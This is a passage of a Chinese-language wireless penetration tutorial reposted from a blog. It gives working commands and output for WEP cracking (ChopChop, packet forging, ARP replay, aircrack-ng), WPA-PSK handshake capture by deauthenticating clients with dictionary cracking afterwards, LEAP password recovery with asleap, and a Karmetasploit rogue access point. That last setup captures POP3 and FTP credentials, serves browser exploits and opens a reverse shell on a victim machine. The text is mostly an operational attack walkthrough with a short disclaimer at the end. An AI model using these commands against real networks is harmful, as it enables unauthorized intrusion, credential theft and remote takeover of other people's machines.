[0x05e] - Korek ChopChop ***
有一個傢伙 KoreK 開發了一個棘手的***方法,稱爲 ChopChop。它要求只有一個加密的數據包用來解密獲取的密鑰流,然後使用密鑰流生成 ARP 請求數據包,並最終執行 ARP 協議重播***。
我們使用 ChopChop ***,可以鍵入如下所示命令:
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng 將挑選一個數據包進行解密。
響應如下所示:
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K...
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72.............................. ...r
Use this packet ?
我們仍然鍵入“y”。
Use this packet ? y
然後系統進行解密。
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C |
Offset 86 ( 5% done) | xor = 16 | pt = 1D |
Offset 85 ( 7% done) | xor = 63 | pt = 7F |
Offset 84 ( 8% done) | xor = 97 | pt = 6B |
Offset 83 (10% done) | xor = 0E | pt = 0A |
Offset 82 (12% done) | xor = 86 | pt = 0D |
64 frames written in 1097ms
119 frames written in 2029ms
146 frames written in 2476ms
239 frames written in 4068ms
228 frames written in 3865ms
273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
這一過程由 xor 文件和 cap 文件產生。xor 文件包含密鑰流;cap 文件包含解密數據包。
[0x05f] - 數據包僞造
創建加密的數據包形式 PRGA(XOR)從 ChopChop 或碎片得到。
#Packetforge-ng -0 - a xx:xx:xx:xx:xx:xx - h yy:yy:yy:yy:yy:yy - k
255.255.255.255 -y replay_dec-0223-211410.xor -w arp
其結果是:
Wrote packet to: arp
從這個命令中,我們得到 ARP 請求數據包中的文件名爲“arp”。
[0x05g] - 交互式 ARP 重播***
我們使用 aireplay 注入 ARP 請求數據包到接入點。通過輸入下面的命令。
#aireplay-ng -2 -r arp rausb0
響應將如下所示所示:
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
255.255.255.255 - l
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334........... ..U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
我們迴應“y”。
Use this packet ? y
aireplay-ng 開始注入數據包。
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
[0x05h] - 破解 WEP 密鑰
在我們收集足夠的加密包之後,我們使用 aircrack-ng 來恢復密鑰。
#aircrack-ng -z capture1.cap (PTW Attack)
成功地破解結果如下所示:
Opening capture1.cap
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
[0x06] - 破解 WEP 的總結腳本
Note: $AP 是接入點的 MAC 地址
$WIFI 是 WIFI 網卡的 MAC 地址
- airmon-ng start wlan0 11 (監控模式必須確定具體頻道)- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 - aireplay-ng -4 -b $AP -h $WIFI wlan0
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** 這些方法可用於客戶端的 WEP 破解。
[0x07] - 擁有 WPA-PSK/WPA2-PSK 密鑰
PSK 代表 Pre-Shared 密鑰。這些機制的改善從而解決了 WEP 的脆弱性。
因此,它能夠使用相同的破解 WEP 方式來破解密鑰。只有這樣,才能恢復 WPA-PSK 或 WPA2-PSK,也就是說獲取4 次握手並利用字典***的破解。
這個主意破解 Pre-shared 密鑰是收集四次握手包。我們能夠做到這一點,去驗證相關的客戶端。這種方式將迫使客戶端進行重新驗證,我們可以在這個進程中進行四次握手。驗證命令如下所示:#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
我猜想我們獲取了這一進程 workshop.cap 文件。所以,我們使用 aircrack 進行破解。#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
成功的結果如下所示:
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
從這個結果中可以看出,它意味着 WPA-PSK/WPA2-PSK 密鑰是“TheFuckinWPAKey”。
[0x08] - 無線網企業漏洞利用 (WPA-TLS/TTLS/PEAP)
大多數公司轉向使用公共密鑰加密的無線網絡,他們認爲這是絕對安全的。但是,狡猾的***者***這一系統仍然是由欺騙證書。
這種***方法是一種利用客戶端信息。許多客戶端接受認證而不考慮它是否是真正的證書或沒有證書。這使***者冒充自己是 RADIUS 服務器和 Loggin 憑證資料的受害者。
我們可以使用 Freeradius 僞裝 Radius 服務器與 WPE 補丁結合,使 Loggin 憑證資料到 Freeradius 服務器。附加說明:http://www.willhackforsushi.com/FreeRADIUS_WPE.html
[0x09] - CISCO LEAP 漏洞利用
Cisco 專有輕量級擴展身份驗證協議(LEAP)無線認證過程有助於消除安全漏洞,基於用戶的認證,並能夠產生動態的 WEP 密鑰。Cisco LEAP 是一個所指定的 802.1X 可擴展身份驗證協議(EAP)類型。
LEAP 是易於執行和控制的特性,如:
- 相互身份驗證
- 基於用戶驗證
- 動態 WEP 密鑰
本文轉載自:神祕小強' blog QQ交流羣:29097418
我們發現用戶名是以明文發送到 Radius,但捕獲的 Wireshark 密碼是加密的,因此,同樣容易進行漏洞利用。asleap 是一個工具,用來恢復脆弱的 LEAP 和 PPTP 密碼,asleap 可以執行:
- 脆弱的 LEAP 和 PPTP 密碼恢復
- Deauthentication 客戶端的 WLAN(加快 LEAP 密碼恢復)AIRJACK 驅動程序
下載 Asleap http://asleap.sourceforge.net/
第一步,使用 asleap 建立必需的資料庫(.dat)和索引文件(.idx)
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
genkeys 1.4 - generates lookup file for asleap. <mailto:[email protected] > Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
最後一個步驟是恢復薄弱的 LEAP 密碼,運行 asleap 命令創建新的.dat 和.idx 文件:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
asleap 1.4 - actively recover LEAP/PPTP passwords. <mailto:[email protected] > Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
注意:成功率取決於字典大小
現在 ASLEAP 2.2,包含“-C”和“-R”選項來指定十六進制分割字節的挑戰與對策。使用此選項,Asleap 成爲一個通用的 MS-CHAPv2 破解工具。
[0x10] - Karmetasploit 大規模利用
HD Moore 發佈了一些說明信息(http://trac.metasploit.com/wiki/Karmetasploit)獲得 karmetasploit 工作的框架。
Karmetasploit 可以發送僞裝 AP 並與客戶端連接。***者可以記錄 Cookie、Ftp、Http、認證信息等等。還可以在客戶端機器利用瀏覽器漏洞。
這種方法測試在 Backtrack3(最終)
http://www.smxiaoqiang.cn/
1. 更新 Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng $ make
# make install
2. 讓我們測試一下 aireplay-ng 的工作(注入數據包必須支持你的無線網卡)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests... 15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC' 15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP' 15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27 15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi' 15:56:53 0/30: 0%
現在它在進行注入工作!
3. 更新 Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. 下載 Bash 腳本 http://www.darkoperator.com/kmsapng.tgz
該腳本執行以下操作:
- 改變 MAC 地址的接口
- 設置監聽模式的接口
- 啓動 Airbase-ng 的 Karma AP
- 更改 MTU 接口大小
- 設置 IP 地址
- 啓動 DHCPD 服務器
- 設置 iptables 重定向
- 啓動 Metasploit
6. 然後我們運行 kmsapng.sh,像這樣:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ...
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting [*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe [*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core [*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493... [*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\> net user
\\CZY 的用戶帳戶
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CZY CZY SUPPORT_388945a0
命令成功完成。
[0x11] - 旅程的尾聲
操作都是處於 Linux 環境下完成的,無論如何,我希望它對你有所幫助。
本文是針對交流技術和合法的***測試目的而寫,作者不負責使用此文件內容所帶來的損害。如果你想對其他人的系統使用這方面的技術,則必須要求對方同意或合法的***測試。
無線網絡***(二)
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.